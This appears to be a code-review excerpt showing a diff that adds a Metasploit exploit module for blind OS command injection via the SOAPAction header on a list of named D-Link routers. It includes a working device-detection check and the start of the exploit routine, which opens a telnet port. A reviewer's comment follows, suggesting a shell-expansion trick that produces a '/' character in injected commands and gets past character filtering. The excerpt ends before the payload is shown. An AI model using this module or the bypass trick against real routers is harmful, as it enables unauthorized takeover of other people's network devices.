modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb

```diff
@@ -0,0 +1,134 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::CommandShell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'D-Link Devices UPnP SOAPAction-Header Command Execution',
+      'Description' => %q{
+        Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
+        interface. Since it is a blind OS command injection vulnerability, there is no
+        output for the executed command. This module has been tested on a DIR-645 device.
+        The following devices are also reported as affected:
+        DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB
+        DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
+      },
+      'Author'      =>
+        [
+          'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645
+          'Craig Heffner', # independent Vulnerability discovery on different other routers
+          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'],
+          ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/']
+        ],
+      'DisclosureDate' => 'Feb 13 2015',
+      'Privileged'     => true,
+      'Platform'       => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Targets'        =>
+        [
+          [ 'Automatic',        { } ]
+        ],
+      'DefaultTarget'  => 0
+      ))
+  end
+
+  def check
+    uri = '/HNAP1/'
+    soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings"
+
+    begin
+      res = send_request_cgi({
+        'uri'    => uri,
+        'method' => 'GET',
+        'headers' => {
+          'SOAPAction' => soapaction,
+          },
+      })
+      if res && [200].include?(res.code) && res.body =~ /D-Link/
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the device ...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
+    end
+
+    print_status("#{peer} - Exploiting...")
+
+    telnetport = rand(32767) + 32768
```

Comment:
@m-1-k-3 maybe you can do smth. like `export x=${SHELL:0:1}; cmd` to get a `/` and use the env variable in your commands